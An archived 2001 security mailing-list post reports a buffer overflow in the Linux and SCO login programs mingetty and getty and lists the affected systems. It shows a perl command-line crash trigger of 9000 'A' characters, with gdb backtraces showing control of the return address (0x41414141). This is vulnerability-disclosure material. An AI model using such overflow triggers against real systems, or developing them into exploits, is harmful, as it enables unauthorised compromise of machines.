Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: Can anyone verify a core dump on /sbin/mingetty - FOLLOW UP - Getty also dumping core

Re: Can anyone verify a core dump on /sbin/mingetty - FOLLOW UP - Getty also dumping core

From: Scott Mackenzie <smackenz_at_brad.ac.uk>
Date: Mon, 3 Dec 2001 20:07:50 +0000

SEE MESSAGE :
'Can anyone verify a core dump on /sbin/mingetty'
for the original post

The reason why there is no core dump from /sbin is because I didn't have
write access - should have noticed that but there you go.

Ok, bit more information:

This problem is positive in the following systems:
* note there could and probably are more but I've only had word of the
following systems being tested

Red-Hat 6.0 onwards (not tested any before) upto and including 7.2
Mandrake 8.0 2.4.3-20mdksmp (presumably similar to redhat here)
turbolinux 6.0
SCO unix 5.0.5

(this information was quickly gathered by several people; thanks everyone)

----------------------------------------------------

After this discovery KF (dotslash_at_snosoft.com) sent me an email confirming
the bug was in getty

GETTY DUMP <discovered and posted by KF <dotslash_at_snosoft.com>>

# /etc/getty `perl -e 'print "A" x 9000'`
Memory fault - core dumped
# uname -a
SCO_SV unixdev 3.2 5.0.5 i386

root_at_sco.checkfree.com #/etc/getty `perl -e 'print "A" x 9000'`
Memory fault - core dumped
root_at_sco.checkfree.com #uname -a
SCO_SV sco 3.2 5.0.6 i386

Getty:
Program received signal SIGSEGV, Segmentation fault.
0x40058b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x40058b66 in getenv () from /lib/libc.so.6
#1  0x400a6bb3 in _IO_file_close_it () from /lib/libc.so.6
#2  0x400ab1f5 in mallopt () from /lib/libc.so.6
#3  0x400a716d in malloc () from /lib/libc.so.6
#4  0x4009998e in fopen () from /lib/libc.so.6
#5  0x0804d029 in send ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

mingetty:
Starting program: /sbin/mingetty `perl -e 'print "A" x 9000'`
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x4007bab7 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0  0x4007bab7 in vfprintf () from /lib/libc.so.6
#1  0x40097722 in vsprintf () from /lib/libc.so.6
#2  0x08048ec9 in alarm ()
#3  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

<thanks KF>

This is it so far, however if you are running a system with mingetty or getty
that's not listed above I would really appreciate further feedback
regarding these bugs.

Cheers

Scott.
Received on Dec 03 2001

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos